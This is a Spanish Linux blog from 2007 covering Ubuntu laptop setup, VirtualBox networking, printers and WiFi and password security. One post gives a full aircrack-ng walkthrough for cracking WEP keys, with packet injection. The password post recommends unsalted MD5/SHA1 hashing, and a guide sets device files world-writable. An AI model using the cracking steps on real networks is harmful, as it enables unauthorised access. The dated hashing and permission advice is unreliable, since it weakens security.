viernes, 28 de diciembre de 2007

Cómo renombrar la extensión de múltiples archivos en ubuntu

Recientemente tuve la necesidad de renombrar la extensión de muchos archivos en forma simultánea.
El comando 'mv' no me servía, y probé con distintas alternativas como usar comandos 'for'.
Finalmente encontré que las distribuciones basadas en Debian tienen el comando 'rename'.
A continuación, la sintaxis para renombrar archivos '.jpg' a '.jpeg'

rename 's/\.jpg/.jpeg/' *.jpg

Saludos!

English version:
http://en.tuxero.com/2007/12/how-to-rename-extension-of-multiple.html

domingo, 9 de diciembre de 2007

Revisión de vuelosbaratos.es

A través de zync.es me llegó la oferta de realizar un post patrocinado sobre www.Vuelosbaratos.es.
Estuve mirando el sitio, y desde el aspecto gráfico no me llama mucho la atención. Sinceramente creo que podrían haber hecho un mejor trabajo. No digo que sea malo, simplemente que podría ser mejor. De todas formas tampoco resulta chocante, y no es sobrecargado.
Desde el punto de vista de la aplicación, es muy web 2.0, con mucho AJAX (para los que no lo saben: es la posibilidad de realizar acciones sobre el servidor y mostrar el resultado en pantalla, sin refrescar la página), y muy intuitivo.
Para realizar una búsqueda de pasajes, debes indicar origen, destino y fecha. En el caso de origen y destino, no me funcionó poner el país; esto me resultó bastante contraproducente. ¿Qué sucede si yo quiero ir a Suiza? No sé si es mas barato ir a Ginebra o a Zurich. Debo hacer las dos búsquedas por separado y comparar los resultados manualmente.
Los cuadros de texto donde se insertan origen y destino son bien AJAX. A medida que vas tipeando, te aparece una ventana con los resultados coincidentes (lo cual es muy bueno para la usabilidad).
Una vez que insertas origen, destino y fecha, empieza a mostrar los resultados a medida que los obtiene de los múltiples servidores a los que se conecta. Es muy importante tener esto en cuenta, ya que los primeros resultados podrían NO ser los mas baratos; siempre conviene contar con los precios de la mayor cantidad de proveedores posible. A la izquierda te va diciendo el estado de la búsqueda: qué servidores ya han sido consultados, cuáles faltan, y un botón por si quieres detener la búsqueda.
Una vez que finaliza la búsqueda, es muy probable que como primeros resultados te incluya los pasajes patrocinados (los cuales en los casos en que yo probé, eran sensiblemente caros).
Luego que cuentas con los resultados, puedes darle clic sobre 'Reservar'. Aquí la cosa se puso un poco extraña, ya que te redirige a la página del operador, y esto se vuelve bastante confuso. En algunos casos tuve que volver a realizar la búsqueda (viajar.com), en otros al querer confirmar me daba error de página no existente (marsans.es).
Conclusión:
Me parece una buena idea, no del todo bien aplicada.
Lo negativo: es bastante malo que cuando elijas uno de los servicios, tengas que volver a realizar la búsqueda, o bien te tire un error como página no encontrada.
Lo positivo: el sitio cumple con su cometido; puedes comparar precios, y encontrar el más barato.

Eso es todo amigos.
Saludos!!

jueves, 22 de noviembre de 2007

Closed source

Estoy trabajando en un proyecto, en el cual tengo que conectarme a una base de datos de un sistema de gestión.
La base de datos corre sobre SQL Server 2005. "No hay problemas!" pensé en todo momento, dado que vengo trabajando con SQL Server desde su versión 7.0 (y uso SQL Server 2005 prácticamente desde que estuvo disponible).
Cuanta fue mi decepción al encontrar que las tablas se llaman TRAxxx, SUAxxx, STAxxx, etc (donde xxx es un número). Hay varios prefijos, y cientos de tablas por prefijo. He hecho ingeniería inversa en el pasado, y esto no me asusta para nada (de hecho, encontré rápidamente cuáles son las tablas que necesito).
Incluso encontré que en las tablas que examiné no existen relaciones enforzadas. A los desarrolladores del sistema: por favor lean algo de integridad referencial.

Creo que existen dos motivos principales por los que uno podría poner nombres de tabla que no reflejen las entidades persistidas:
- Mal diseño de base de datos.
- Un intento por ocultar el contenido de la base de datos.

Sin llegar al extremo de proponer que esta gente libere el código fuente, me parece que existen puntos intermedios. La empresa que compra las licencias de software debería ser dueña de la información, y esto incluye la posibilidad de utilizar los datos como crea conveniente.

Es lamentable lo que encontré, en cuanto a diseño de la base de datos, y en cuanto a su forma críptica de nombrar tablas.

Creo que cuando desarrollamos sistemas, nuestra estructura de trabajo debe ser clara y transparente. Debemos otorgar a nuestros clientes la libertad de elección. Ya cobramos por nuestro trabajo, no necesitamos esclavizar a nuestros clientes. En todo caso que nos vuelvan a elegir por la calidad de nuestras soluciones, y no por falta de opciones.

English version:
http://en.tuxero.com/2007/11/closed-source.html

viernes, 26 de octubre de 2007

Blackberry 8800 adquirido

Amo la tecnología desde niño, pero últimamente estoy un poco irritado con el exceso tecnológico.
Por momentos me siento sobre-conectado. Cuentas de correo, IM, celular, SMS, todo demandando mi atención. Cuando surgió la idea de tener un Blackberry por un tema de trabajo, realmente no quería hacerlo. Me parecía demasiado.
El trabajo se antepone, por lo que terminé adquiriendo un Blackberry 8800.

Qué equivocado estaba.

Ahora que lo tengo, me pregunto cómo hacía yo antes para vivir sin él. Más allá que es un hermoso 'chiche', su utilidad es increíble.
La interfaz gráfica me parece que no es del todo bonita, se maximiza la funcionalidad, dejando un poco de lado el diseño. No tengo quejas, pero creo que podrían haberlo hecho 'un poquito' mas lindo.

Creo que lo mejor que tengo para decir es que antes, yo estaba pendiente de tener que mirar el correo. Muchas veces trabajando en la calle, viendo clientes, sin tiempo para ir a algún lugar que tenga WiFi (son escasos en mi ciudad) y abrir la notebook. Desapareció esa ansiedad. Los mails que me importan llegan a mi BB, con la tecnología de push-mail. Es fabuloso, me siento arcaico por haber esperado tanto tiempo para tener uno!

Bueno, tengo que terminar, porque tengo mails que responder en el BB :-D

Saludos!

English version:
http://en.tuxero.com/2007/10/blackberry-8800-acquired.html

Technorati tags:

domingo, 14 de octubre de 2007

Usando Ubuntu Gutsy Beta

El sistema se muestra muy estable. Lo único es que eventualmente tengo problemas para apagar la notebook.
Instalé el 'Advanced Desktop Effects Settings' para configurar el Compiz Fusion, y es una buena forma de perder el tiempo. Tiene muchos efectos, algunos de ellos muy divertidos. La versión anterior no tenía una configuración tan detallada. Está muy bueno personalizar completamente los efectos de escritorio.
Todavía tengo pendiente probar la virtualización, pero probablemente espere a que salga la versión final (falta tan poco!).
En resumen, parece que va a ser una muy buena versión de Ubuntu, y es verdad que han ampliado mucho la compatibilidad con las notebooks.

English version:
http://en.tuxero.com/2007/10/using-ubuntu-gutsy-beta.html

Technorati tags:

lunes, 1 de octubre de 2007

Probando Ubuntu Gutsy Beta

Instalé Ubuntu Gutsy Gibbon Beta en mi Sony Vaio VGN-N350FE para probarlo.
La instalación fue casi sin problemas. Lo único es que en un momento tiró un error diciendo que la partición de la cual importar la configuración anterior ya estaba montada, aún cuando le indiqué que no efectuara esa importación. Le dí al botón 'Continuar', y la instalación se completó correctamente.
Encuentro al sistema muy estable. El control de brillo funciona correctamente, lo cual es una mejora respecto de versiones anteriores. También funciona la suspensión y la hibernación, aunque luego de probar estas funciones varias veces, tuve problemas para apagar la máquina, no sé si será debido a esto, u otra cosa.
Hasta ahora, probé las siguientes cosas:

Configuración de Pantalla
El soporte para múltiples monitores ahora es mucho mas intuitivo, no hace falta editar el archivo /etc/X11/xorg.conf, lo cual puede ser críptico para usuarios principiantes.
Como puedes ver en la imagen, la utilidad de configuración es muy intuitiva.

Administración de impresoras
Esta versión incluye la configuración automáticas de impresoras, en el momento de ser conectadas. No pude probar esta función, pero tengo una impresora de red HP 2600n, y agregarla fue realmente sencillo.
Abrí la aplicación de configuración de impresoras.
En esta aplicación, le dí clic al botón 'New printer'. Introduje los valores apropiados para mi impresora, y luego clic al botón 'Forward'.Abrió la ventana de selección de drivers. Elejí 'HP', y luego 'Color Laserjet 2600n'.

Luego me pidió que introduzca el nombre de la impresora. Luego de hacerlo, le dí clic al botón 'Apply'.
Y listo! La impresora quedó correctamente configurada. La impresión de la página de prueba funcionó correctamente.

Códecs de vídeo
Intenté reproducir una película, y me indicó que no estaban disponibles los códecs de vídeo.
Le dí clic al botón 'Search', y encontró los códecs apropiados.
Luego de seleccionarlos, me pidió la confirmación para instalar software privativo.
Luego de esto, quedó instalado correctamente.

Resumen

Hasta ahora se trata de un sistema realmente estable, es mas compatible con mi notebook, y mas sencillo de usar. A medida que lo siga probando, voy a seguir posteando las pruebas.

Saludos!

Technorati tags:


English version:
http://en.tuxero.com/2007/10/testing-ubuntu-gutsy-beta-screenshots.html

viernes, 28 de septiembre de 2007

Ubuntu Gutsy Gibbon (7.10) Beta está disponible

Canonical hizo pública una nueva beta de Ubuntu Gutsy Gibbon.
Estoy bajando la versión, así que cuando la pruebe, les voy a comentar cómo anduvo. Es una versión muy esperada, dado que incluye mejor soporte para notebooks, configuración gráfica del gestor de ventanas, mejor soporte para monitores duales, mejor soporte de drivers privativos, compiz fusion, apparmor, soporte de escritura para particiones NTFS, configuración automática de impresoras (esto quiero verlo!), búsqueda de escritorio, Gnome 2.20 y un largo etcétera.
Enlace: http://www.ubuntu.com/testing/gutsybeta
Saludos!
English version:
http://en.tuxero.com/2007/09/ubuntu-gutsy-gibbon-710-beta-available.html

Technorati tags:

viernes, 21 de septiembre de 2007

Cómo almacenar passwords en una base de datos

A menudo escribimos aplicaciones que deben realizar validación de usuarios y permisos. En estos casos es bastante común que los desarrolladores incluyan campos como 'User' y 'Password' en la tabla de usuarios. También sucede que las contraseñas se guardan en texto plano, lo cual acarrea problemas de seguridad, como veremos a continuación.
Los administradores de la base de datos NO deben tener acceso a las contraseñas. Además, si un atacante logra acceso a la base de datos, va a tener una manera muy fácil de obtener las contraseñas de los usuarios.
Incluso, dependiendo de la configuración de la base de datos, es posible que cuando busquemos "SELECT * FROM USERS WHERE USER='my_user' AND PASSWORD='my_password';", no se valide si la contraseña está en mayúsculas o minúsculas. Esto hace fácil a los atacantes probar distintas contraseñas, ya que no se está validando mayúsculas y minúsculas.
A veces los desarrolladores encriptan las contraseñas aplicando algún algoritmo de encripción. Hay que tener cuidado por los siguientes motivos:
- En general estos algoritmos son bidireccionales, lo cual quiere decir que si tenemos la clave de encripción, se puede obtener la contraseña original a partir del texto cifrado.
- Los buenos algoritmos de encripción son en general conocidos y verificados por la comunidad de programadores y matemáticos. Debes desconfiar de aquellos que ofrecen fórmulas 'mágicas' o que no quieren divulgar la forma de encripción.
Solución:
Lo que debemos hacer es aplicar un algoritmo de hash (ej: SHA, SHA1, SHA2, MD5, etc) a la contraseña para obtener un código a partir del cual no se pueda obtener el texto original. Esto debe hacerse cada vez que el usuario suministra una contraseña, ya sea en el ingreso al sistema, o cuando el usuario modifica su contraseña. Recuerda almacenar en la base de datos el resultado de aplicar el algoritmo de hash a la contraseña suministrada por el usuario.
Cuando busquemos el usuario, la consulta SQL quedaría algo así: "SELECT * FROM USERS WHERE USER='my_user' AND PASSWORD='5eb942810a75ebc850972a89285d570d484c89c4';".
Implicancias: si antes el usuario olvidaba su contraseña, podía pedírsela a los administradores. Ahora, hay que implementar una rutina de blanqueo de contraseñas para estos casos.
Espero que esto ayude.

Saludos!
English version

Technorati tags:

martes, 18 de septiembre de 2007

Virtual Box 1.5 networking en Ubuntu Feisty

Como publiqué en otro post, instalé el Virtual Box 1.5.
Ahora que empecé a usarlo, encontré un par de problemas. Para empezar, quería copiar los discos virtuales (VDI), y para mi sorpresa, copiar los archivos no funciona. Hay que usar la herramienta de clonado de discos, como se ve a continuación:

VBoxManage clonevdi origen.vdi destino.vdi

El siguiente problema que encontré es que no me funcionaba la red en 'Interface Anfitrión'. Luego de ver la ayuda y dar unas cuantas por google, ubuntuforums y demás, encontré la manera de hacerlo andar. Acá va un mini howto.
Primero instalamos los paquetes necesarios:
sudo apt-get install bridge-utils
sudo apt-get install uml-utilities


Luego tenemos que definir las interfaces de red. Editamos el archivo de interfaces:
sudo gedit /etc/network/interfaces

Agregamos las interfaces necesarias (remplazando 'user' por el usuario que usará las máquinas virtuales, y obviamente una IP adecuada):
auto br0
iface br0 inet dhcp
bridge_ports eth0 br0

auto tap0
iface tap0 inet manual
up ifconfig $IFACE 192.168.0.150 up
down ifconfig $IFACE down
tunctl_user user


Reiniciamos la red:
sudo /etc/init.d/networking restart


Agregamos el usuario al grupo uml-net:
sudo gpasswd -a user uml-net


Esto debería funcionar según el manual, pero no. Encontré que para que funcione debemos ejecutar:
sudo chmod 0666 /dev/net/tun
sudo chmod 0666 /dev/vboxdrv


Luego de esto, podemos establecer 'Interface Anfitrión', y en el nombre de la interface introducimos 'tap0'.

Y listo!

Saludos!

English version

lunes, 17 de septiembre de 2007

HP Laserjet 1018 en Ubuntu Feisty

Recientemente tuve que configurar una HP Laserjet 1018 en Ubuntu Feisty.
Simple como parece, no lo es.
La impresora se agrega correctamente, y cuando intento imprimir una página de prueba, el proceso ocurre sin errores, excepto que no imprime!
Esto me parece lo suficientemente malo, dado que si no puede imprimir, al menos debe arrojar un error al usuario.
Buscando, encontré cómo hacerla funcionar aquí.
Se indica bajar y compilar el driver desde aquí.
Siguiendo estos pasos pude instalar correctamente la impresora, pero aún así, fue un proceso mas bien complejo.
Saludos!

Technorati tags:


English version

miércoles, 5 de septiembre de 2007

Virtual Box 1.5.0 liberado

La gente de innotek me sorprendió con la nueva versión de Virtual Box.
Virtual Box es un sistema de virtualización de código abierto (libre y gratis) que nos permite tener máquinas virtuales sobre un sistema operativo anfitrión.
Yo lo bajé e instalé en minutos (utilizo Ubuntu). La instalación fue ágil y sencilla. Instalar una máquina virtual fue verdaderamente sencillo.
Lo que más me sorprendió es el 'Seamless mode' que permite tener ventanas del sistema operativo invitado mezcladas con la del sistema operativo anfitrión.
Soy un gran amante de la virtualización, dado los grandes beneficios que aporta. Esto para mí es una muy buena noticia, dado que otras soluciones como VM Ware Server (gratis, no libre) no siempre son sencillas de instalar e implementar.

Lo ví en genbeta.
Lo puedes bajar de virtual box.

Saludos!
English version

lunes, 3 de septiembre de 2007

Cómo borrar archivos inútiles de Windows en Ubuntu Linux

Luego de usar mucho tiempo Windows, mis carpetas de música y fotos están llenas de archivos 'desktop.ini' y 'Thumbs.db'. Como hace un tiempo uso sólo Ubuntu Linux, decidí eliminar esos archivos.
Para hacerlo, puedes usar este comando (ten en cuenta que recorre todas las subcarpetas que indiques en la ruta, así que no lo hagas sobre la carpeta raíz):

find /ruta -type f -name "desktop.ini" -exec rm -f {} \;
find /ruta -type f -name "Thumbs.db" -exec rm -f {} \;
También podemos usar este comando para eliminar las tapas de los álbumes de nuestras carpetas de música:
find /ruta_musica -type f -name "*.jpg" -exec rm -f {} \;
Como ves, esto puede usarse para borrar cualquier archivo (o tipo de archivo) recursivamente en directorios. Puedes usarlo para borrar otros archivos, siempre y cuando tengas cuidado de no borrar archivos demás.
Si quieres examinar los archivos que serán borrados antes de hacerlo, debes ejecutar el mismo comando cambiando 'rm' por 'ls', así:
find /ruta -type f -name "desktop.ini" -exec ls -f {} \;
De esta forma puedes controlar el listado de archivos a borrar.
Espero que te sea útil.

Saludos!

English version
Technorati tags:

jueves, 30 de agosto de 2007

Cómo hacer contraseñas seguras

Nuestras contraseñas pueden ser adivinadas u obtenidas por ataques basados en diccionarios. Para proteger nuestros datos y recursos privados, debemos tener palabras claves que no puedan ser adivinadas y que no figuren en diccionarios.

A continuación unas recomendaciones para que nuestras contraseñas sean mas seguras:
Debes evitar usar fechas, nombres y palabras que estén en diccionarios.
Debes utilizar letras (mayúsculas y minúsculas), mezcladas con números y símbolos.
Debes utilizar contraseñas lo más largas posibles.
Debes cambiar las contraseñas periódicamente.

Dada la dificultad que puede involucrar recordar un password como 'ñF(fh3#"$j9', puedes usar la siguiente técnica para hacer menos arduo el trabajo:
Piensa una frase (de cinco o más palabras) que signifique algo para tí. En este ejemplo voy a usar 'Ladran, Sancho. Señal que cabalgamos.'. Luego toma un número de tres o cuatro dígitos que puedas recordar (yo usaré 1234). Ahora con todo eso, tomas la primer letra de cada palabra (una en mayúsculas y otra en minúsculas), y la vas alternando con los números. Si utilizas siempre el mismo tipo de teclado (o si conoces las distribuciones de teclado de memoria), puedes convertir los números en símbolos presionando la tecla 'mayúsculas'.
Siguiendo el ejemplo, mi palabra clave quedaría así:
L1s"S3q$C

Esto es una base, puedes alterar la idea, por ejemplo empezando por los números, o dos letras y un número, o que la letra sea la segunda letra de cada palabra, etc. Usa tu imaginación!

Ya tienes las bases para tener contraseñas seguras fáciles de recordar.

Saludos!
English version

Technorati tags:

lunes, 27 de agosto de 2007

Cómo hacer una red WiFi más segura

Decidí reunir una serie de recomendaciones para hacer más seguras las redes WiFi.

Tener en cuenta que todos los sistemas son vulnerables, sólo se trata de bajar el riesgo de ser vulnerado.

Divido las recomendaciones en dos partes: la del AP (Access Point) y la de la estación de trabajo.

En el AP

  • Cambiar el SSID por defecto. No conviene dejar aquellos que vienen de fábrica (ej: Linksys, 3COM, etc.)
  • Cambiar la contraseña del AP. Es relativamente fácil determinar el modelo del AP, y de ahí saber cuál es la contraseña del administrador por defecto.
  • Desactivar el broadcasting del SSID. Esto no agrega mucha seguridad, pero desalienta al 'hacker casual'.
  • Usar WPA o WPA2. No dejar la red sin seguridad. WEP es vulnerable (ver mi otro post http://www.tuxero.com/2007/08/howto-crack-wep-sony-vaio.html), de todas maneras, si no se cuenta con WPA o WPA2, WEP es mejor que nada.
  • Filtrar por MAC Address. Si bien puede cambiarse la MAC de una placa de red, esto es más complicado para el común de la gente.
  • Desactivar DHCP. A menos que no sea posible, utilizar direcciones de IP fijas en la red.
  • Limitar el número máximo de IPs en el DHCP. Esto limitaría la cantidad de dispositivos que se conectan a la red (de todas maneras más dispositivos pueden agregarse con IPs fijas).
  • Apagar el AP cuando no esté en uso. Esto no siempre es posible. Para redes hogareñas, esta opción es buena, siempre y cuando uno no deje la estación de trabajo prendida para acceder a ella desde internet.
  • Cambiar las claves regularmente. Con el tiempo las claves pueden ser obtenidas. Cambiarlas regularmente es una buena práctica.
  • Limitar la potencia del AP. Esto es bastante efectivo, siempre es conveniente bajar la potencia al mínimo posible (verificando que el dispositivo más alejado pueda conectarse correctamente). Esto baja las posibilidades de conexión de dispositivos distantes (por ejemplo que estén en la calle).
  • Ubicar el AP adecuadamente. Conviene dejar el AP en el centro de la residencia, lejos de las ventanas y paredes exteriores (ver punto anterior).
  • Usar contraseñas seguras. Conviene usar palabras clave que mezclen letras (mayúsculas y minúsculas), números y signos. Si fuera posible, utilizar contraseñas enteramente aleatorias en hexadecimal.
  • Deshabilitar administración remota en el AP. Esto previene que alguien desde fuera de la red gane acceso al AP.
  • Activar el Firewall en el AP.

En la estación de trabajo

  • Verificar quién instaló el AP. Existen APs que están para captar el tráfico de red de las estaciones de trabajo. Debe verificar que sea un AP legítimo.
  • Navegando por internet no ingresar contraseñas o información sensible en páginas no seguras. Antes de ingresar números de tarjetas de crédito, contraseñas bancarias o de correo electrónico, verificar que la dirección del sitio que visita empiece con 'https://'.
  • No tener carpetas compartidas públicas. Esto es un error bastante común: dejar carpetas compartidas mientras uno se conecta a una red inalámbrica (pública).
  • Verificar tener un firewall activo. Cuando uno se conecta en redes WiFi públicas está expuesto al ataque de otras estaciones de trabajo dentro de la red.
  • Apagar la placa de red inalámbrica cuando no esté en uso. Más allá del obvio ahorro de energía, un atacante podría crear una red ad-hoc con la placa de red activa.
  • Utilizar una VPN. Si uno cuenta con una VPN (generalmente disponible en entornos corporativos), esto hace más segura la conexión de la estación de trabajo.

Siempre hay que recordar que 'sólo se lo estamos haciendo más difícil'. Tampoco es cuestión de hacérselos fácil ;-)

Estoy abierto a sugerencias para ampliar esta lista de recomendaciones.
Pueden mirar los siguientes enlaces también:

Saludos!

English version

Technorati tags:

HOWTO Crack WEP - Sony Vaio

Por una necesidad laboral, tuve que demostrar que WEP es falible. Aunque que yo 'sabía' que ésto podía hacerse, en la práctica nunca lo hice yo.

Nota: Esto es para fines de investigación, aprendizaje, y verificación de seguridad. No debe usarse para vulnerar redes de otras personas. Atacar y vulnerar redes (u otros recursos) es malo, e ilegal.

Investigando un poco, encontré que la placa de red de mi Sony Vaio VGN N350FE, una Intel 3945ABG, no permitía ciertas cosas desde linux, entre las cuales una de ellas era necesaria para poder demostrar esta vulnerabilidad.
Si leyeron mis posts anteriores, verán que no es el primer problema que encuentro con el hardware.
Tampoco es el primero al que encuentro solución :-)

Encontré un howto en http://foro.seguridadwireless.net/index.php?topic=3227.0 que usé como base.

A continuación, les explico los pasos que seguí para romper WEP.
Necesitamos una distribución de linux que podemos encontrar en http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. Bajamos la imagen del CD, y la quemamos.

Iniciamos la máquina con WifiWay (debe estar configurada para permitir iniciar desde CD/DVD).

Una vez iniciada, iniciamos el entorno gráfico mediante el comando:

startx

Ingresamos el canal en el que está el AP (Access Point) en la placa de red.

echo 'CANAL_DE_CAPTURA' > /sys/class/net/wifi0/device/channel

Obtenemos el BSSID, el canal, y el ESSID.

airodump-ng rtap0

Cerramos la ejecución con CONTROL-C, y utilizamos configuramos el BSSID (un número hexadecimal de 6 posiciones) en la placa de red.

echo 'BSSID_DEL_ACCESS_POINT' > /sys/class/net/wifi0/device/bssid

Una vez hecho esto, iniciamos la captura.

airodump-ng -c CANAL_DE_CAPTURA -w ARCHIVO_CAPTURA rtap0

Abrimos otra ventana y configuramos la velocidad a 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

Subimos la placa de red.

ifconfig wifi0 up

Averiguamos la MAC address, son los 12 primeros numeros de HWaddr

ifconfig

Iniciamos una asociación con el AP.

aireplay-ng -1 0 -a BSSID_DEL_ACCESS_POINT -h MAC_ADDRESS_WIFI -e ESSID_DEL_ACCESSPOINT wifi0

Abrimos otra consola y ponemos para inyectar tráfico.

aireplay-ng -3 -b BSSID_DEL_ACCESS_POINT -e ESSID_DEL_ACCESSPOINT -h MAC_ADDRESS_WIFI wifi0

Esto debería aumentar los #data en la ventana de captura (pasa un momento antes que empiece a aumentar).
Cuando tengamos mas de 100.000 podemos extraer la clave ejecutando:

aircrack-ptw ARCHIVO_CAPTURA.cap

Esto debería encontrar la clave de red en formato hexadecimal.

Nota: En todos los comandos anteriores, wordpress convierte automáticamente las comillas a comillas formateadas. Por favor usar comillas simples.

Espero, estimados lectores, que esto haya sido de utilidad.

Saludos!

English version


HOWTO Ubuntu Feisty + Sony Vaio VGN N350FE

Con algo de paciencia, buscando en foros, investigando, y una dosis de suerte, logré resolver el problema de energía de mi laptop: una Sony Vaio VGN-N350FE utilizando Ubuntu Feisty.
Advertencia al lector: si es tan audaz de realizar esto howto, tenga en cuenta que el sistema puede volverse inestable, inusable, o cosas peores, como dañar el hardware. Siga estos pasos sólo a su propio riesgo.
En una instalación limpia de Ubuntu Feisty actualizo todos los paquetes que me ofrece el gestor de actualizaciones.
Instalo el kernel 2.6.22.9 (disponible en la versión de Gutsy), para lo que necesitamos incluir los repositorios correspondientes.
En la línea de comandos ejecutamos:

sudo gedit /etc/apt/sources.list

Cuando nos abra el editor, agregamos las dos siguientes líneas al final del archivo.

deb http://archive.ubuntu.com/ubuntu/ gutsy main restricted
deb http://archive.ubuntu.com/ubuntu/ gutsy universe

Guardamos y cerramos. Ejecutamos lo siguiente:

sudo apt-get update

Luego de esto, es posible que el update manager nos ofrezca actualizar muchos paquetes (que en realidad son de gutsy). No debemos hacerlo. Sólo los consignados aquí deben ser instalados.
Ejecutamos:

sudo apt-get install linux-backports-modules-2.6.22-9-generic linux-headers-2.6.22-9 linux-headers-2.6.22-9-generic linux-image-2.6.22-9-generic linux-restricted-modules-2.6.22-9-generic linux-ubuntu-modules-2.6.22-9-generic

Como acabamos de instalar un nuevo kernel, creo que es buena idea reiniciar el equipo. Luego de iniciar nuevamente, abrimos la ventana Terminal y ejecutamos:

sudo apt-get install powertop cpufrequtils libncursesw5

Ahora debemos quitar los repositorios de Gutsy. Ejecutamos en lo siguiente:

sudo gedit /etc/apt/sources.list

Comentamos las líneas que insertamos con los repositorios anteponiendo el símbolo numeral ('#') al principio de las líneas.
Actualizamos el gestor de paquetes:

sudo apt-get update

Ahora nos aseguramos estén instalados los módulos de gestión de energía de sony. Ejecutamos lo siguiente:

sudo modprobe sony_acpi
sudo modprobe sonypi

Hacemos que dichos módulos se carguen automáticamente:

sudo gedit /etc/modules

En el archivo que se abre, agregamos las siguientes dos líneas:

sony_acpi
sonypi

Ahora ejecutamos esto para poder usar los controles de brillo:

sudo locate -u && for i in $(locate lcd-???-brightness); do sudo cp $i $i.bak; sudo sed -i '1 s|#!/bin/sh|#!/bin/bash|g' $i; done

Ahora podemos agregar el control de brightness al panel de gnome. Luego de esto, reiniciamos la máquina, y cuando volvamos, estará activo el control de brillo.
... y listo!
Cuando utilicemos la notebook con la batería, necesitamos ejecutar en un terminal:

sudo powertop

Esto ejecuta una aplicación (en inglés y modo texto) que nos va diciendo qué elementos están consumiendo energía, y nos recomienda llevar a cabo ciertas acciones para mejorar el uso de la batería.

Siguiendo esto, pasé de que la batería me dure menos de media hora a más de cuatro horas.

Para referencias, me basé en los siguientes posts:

http://www.ubuntugeek.com/howto-upgrade-kernel2622-9-generic-in-feisty-fawn.html
http://ubuntuforums.org/showthread.php?t=479034
http://tuxeando.wordpress.com/2007/05/27/probando-el-nuevo-kernel-2622/

Saludos!

English version


Technorati tags:

Poniendo a punto mi notebook

Recientemente compré una notebook Sony Vaio VGN-N350FE.

En mi home-office tengo una impresora láser color HP 2600n, y con mi flamante notebook, no puedo imprimir. El Windows Vista me tira un error de "Data Execution Prevention" y se muere el servicio de spool de impresiones (previo a esto, jamás tuve problemas - ni con Windows XP, ni con ubuntu).

Busqué en google a fondo, y no hay solución. Parece ser un problema de compatibilidad entre los drivers de HP y la nueva versión de Windows.

Esto (y otros motivos) me hacen decidir instalar ubuntu feisty en esta máquina. Todo es fantástico, excepto el tema de la administración de la energía. No andan las teclas de función del teclado, y si bien probé lo que proponían algunos tutoriales, no me sirvió (aparentemente tengo un modelo muy nuevo).

Así que mientras tanto si uso Windows, no puedo imprimir, y si uso Linux, la duración de la batería deja mucho que desear...

Les aseguro, estimados lectores, que esto continuará.


English version

domingo, 26 de agosto de 2007

Primer paso

Hola!
Este es el primer post tuxero, con muchas expectativas y ganas.
Este es un saludo cortito, ya que lo principal de este blog es el contenido, no la introducción.
Pronto, pronto, estaré agregando contenidos.

Saludos!

English version